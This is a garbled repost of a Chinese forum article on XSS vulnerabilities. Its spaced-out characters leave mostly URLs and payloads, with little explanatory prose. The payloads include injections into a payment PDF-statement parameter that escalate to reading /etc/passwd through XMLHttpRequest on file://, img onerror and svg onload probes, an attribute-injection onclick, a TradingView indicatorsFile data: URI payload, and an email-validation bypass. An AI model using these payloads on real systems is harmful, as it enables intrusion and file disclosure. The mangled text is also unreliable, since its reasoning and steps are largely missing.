[18866] 2019-05-31_聊聊XSS漏洞(三)

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2019-05-31_聊聊XSS漏洞(三) X S S c r h u a   h u a s e c   2 0 1 9 - 0 5 - 3 1 X S S 0 1 a p p w e b a p p x s s p a y l o a d a p p x s s w e b w e b x s s x s s A P P w e b 访 0 2 X S S   T O   L F I P D F u t r n u m b e r P D F u t r n u m b e r H T M L     " > < s > A a a , H T M L 使   i f r a m e     h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = x y z & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d   h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = " > < s > A a a d a t e   =   2 0 1 7 - 0 8 - 1 1 s e t t l e m e n t _ t y p e   =   a l l a d v i c e _ i d   =   u n d e f i n e d   h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = " > < i f r a m e   s r c = " h t t p : / / l o c a l h o s t " > < / i f r a m e > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d
使 P D F a a a a f u z z , 使 d o c u m e n t . w r i t e , w i n d o w . l o c a t i o n j a v a s c r i p t   f i l e : / /   f i l e : / /   a j a x     / e t c / p a s s w d p a y l o a d : / e t c / p a s s w d 0 3 B i n d   X S S B i n d   X S S   -     -   线 @ h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < p   i d = " t e s t " > a a < / p > < s c r i p t > d o c u m e n t . g e t E l e m e n t B y I d ( ' t e s t ' ) . i n n e r H T M L + = ' a a ' < / s c r i p t > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < i m g   s r c = x   o n e r r o r = d o c u m e n t . w r i t e ( ' a a a a ' ) > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < i m g   s r c = x   o n e r r o r = d o c u m e n t . w r i t e ( ' a a a a ' % 2 b w i n d o w . l o c a t i o n ) > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d < s c r i p t > x = n e w   X M L H t t p R e q u e s t ; x . o n l o a d = f u n c t i o n ( ) { d o c u m e n t . w r i t e ( t h i s . r e s p o n s e T e x t ) } ; x . o p e n ( " G E T " , " f i l e : / / / e t c / p a s s w d " ) ; x . s e n d ( ) ; < / s c r i p t >   h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < s c r i p t > x = n e w   X M L H t t p R e q u e s t ; x . o n l o a d = f u n c t i o n ( ) { d o c u m e n t . w r i t e ( t h i s . r e s p o n s e T e x t ) } ; x . o p e n ( " G E T " , " f i l e : / / / e t c / p a s s w d "
使 s u p p o r t @ e x a m p l e . c o m X S S 0 4 G e t   X S S u r l h t m l   X S S p r o d u c t C h a n n e l I d f o r m x s s 0 5 X S S k 线 t v - c h a r t   p o c : h t t p : / / w w w . x x x . c o m / / p r o d u c t / r e a d . d o ? i d = 2 5 1 & p r o d u c t C h a n n e l I d = 3   h t t p : / / w w w . x x x . c o m / / p r o d u c t / r e a d . d o ? i d = 2 5 1 & p r o d u c t C h a n n e l I d = 3 % 2 2 % 2 0 o n c l i c k = % 2 2 a l e r t ( 1 ) % 2 2   >   u i d = z z & d i s a b l e d F e a t u r e s = % 5 B 1 % 5 D & e n a b l e d F e a t u r e s = % 5 B 1 % 5 D & i n d i c a t o r s F i l e = d a t a : a p p l i c a t i o n / j a v a s c r i p t , a l e r t ( ' 1 ' ) / /
0 6 F I L T E R _ V A L I D A T E _ E M A I L   X S S p a y l o a d : 0 7           X S S 姿 姿 >   u i d = z z & d i s a b l e d F e a t u r e s = % 5 B 1 % 5 D & e n a b l e d F e a t u r e s = % 5 B 1 % 5 D & i n d i c a t o r s F i l e = d a t a : a p p l i c a t i o n / j a v a s c r i p t , a l e r t ( ' 1 ' ) / / < ? p h p e c h o   f i l t e r _ v a r ( $ _ G E T [ " e m a i l " ] , F I L T E R _ V A L I D A T E _ E M A I L ) . " n " ; ? > " > < s v g / o n l o a d = c o n f i r m ( 1 ) > " @ x . y
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则